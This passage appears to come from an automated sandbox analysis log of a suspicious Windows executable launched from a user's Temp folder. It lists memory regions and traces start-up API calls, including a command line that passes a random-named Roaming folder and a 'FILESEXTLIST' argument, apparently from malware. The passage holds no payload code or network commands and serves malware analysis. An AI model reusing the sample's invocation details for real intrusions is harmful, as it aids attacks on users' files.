end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7444 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 7445 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 7446 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 region_type = mapped_file name = "gym4nxcu.exe" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe") Region: id = 7447 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7448 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7449 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 7450 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 7451 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 7452 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7453 start_va = 0x180000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 7454 start_va = 0x280000 end_va = 0x2e6fff entry_point = 0x280000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7455 start_va = 0x5c0000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 7456 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7457 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 7458 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7459 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7460 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7461 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 7462 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7463 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 7464 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 7465 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7466 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7480 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7481 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 7482 start_va = 0x150000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 7483 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 7484 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 7766 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 7767 start_va = 0x3c0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 7772 start_va = 0x11d0000 end_va = 0x12aefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Region: id = 7773 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 7774 start_va = 0x160000 end_va = 0x162fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 7775 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Thread: id = 75 os_tid = 0xdb4 [0113.113] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff7c | out: lpSystemTimeAsFileTime=0x12ff7c*(dwLowDateTime=0x816de2a0, dwHighDateTime=0x1d440a9)) [0113.113] GetCurrentProcessId () returned 0xdb0 [0113.113] GetCurrentThreadId () returned 0xdb4 [0113.113] GetTickCount () returned 0x27177 [0113.113] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff74 | out: lpPerformanceCount=0x12ff74*=16990193395) returned 1 [0113.113] GetStartupInfoW (in: lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x12ff84, hStdError=0x405b06)) [0113.113] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0113.114] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0113.114] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0113.114] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x76961e16 [0113.114] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0113.114] GetProcAddress (hModule=0x76910000, lpProcName="FlsFree") returned 0x76961f61 [0113.115] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0113.120] GetCurrentThreadId () returned 0xdb4 [0113.120] GetStartupInfoW (in: lpStartupInfo=0x12febc | out: lpStartupInfo=0x12febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405699, hStdOutput=0x405a4c, hStdError=0x1507d0)) [0113.120] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0113.120] GetFileType (hFile=0x3) returned 0x0 [0113.120] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0113.120] GetFileType (hFile=0x7) returned 0x0 [0113.120] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0113.120] GetFileType (hFile=0xb) returned 0x0 [0113.120] SetHandleCount (uNumber=0x20) returned 0x20 [0113.120] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0113.120] GetEnvironmentStringsW () returned 0x18fe18* [0113.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1033 [0113.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x1511f8, cbMultiByte=1033, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=C:=C:\\Users\\EEBsYm5\\Desktop", lpUsedDefaultChar=0x0) returned 1033 [0113.120] FreeEnvironmentStringsW (penv=0x18fe18) returned 1 [0113.120] GetLastError () returned 0x6 [0113.120] SetLastError (dwErrCode=0x6) [0113.120] GetLastError () returned 0x6 [0113.120] SetLastError (dwErrCode=0x6) [0113.120] GetLastError () returned 0x6 [0113.120] SetLastError (dwErrCode=0x6) [0113.120] GetACP () returned 0x4e4 [0113.120] GetLastError () returned 0x6 [0113.120] SetLastError (dwErrCode=0x6) [0113.121] IsValidCodePage (CodePage=0x4e4) returned 1 [0113.121] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe84 | out: lpCPInfo=0x12fe84) returned 1 [0113.121] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f950 | out: lpCPInfo=0x12f950) returned 1 [0113.121] GetLastError () returned 0x6 [0113.121] SetLastError (dwErrCode=0x6) [0113.121] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0113.121] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0113.121] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x12f964 | out: lpCharType=0x12f964) returned 1 [0113.121] GetLastError () returned 0x6 [0113.121] SetLastError (dwErrCode=0x6) [0113.121] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0113.121] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ뿽獪ശAĀ") returned 256 [0113.121] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ뿽獪ശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0113.121] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ뿽獪ശAĀ", cchSrc=256, lpDestStr=0x12f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0113.121] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x12fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x62\x83\x0f\x75\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0113.121] GetLastError () returned 0x6 [0113.121] SetLastError (dwErrCode=0x6) [0113.121] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0113.121] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ뿽獪ശAĀ") returned 256 [0113.122] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ뿽獪ശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0113.122] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ뿽獪ശAĀ", cchSrc=256, lpDestStr=0x12f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0113.122] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x12fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\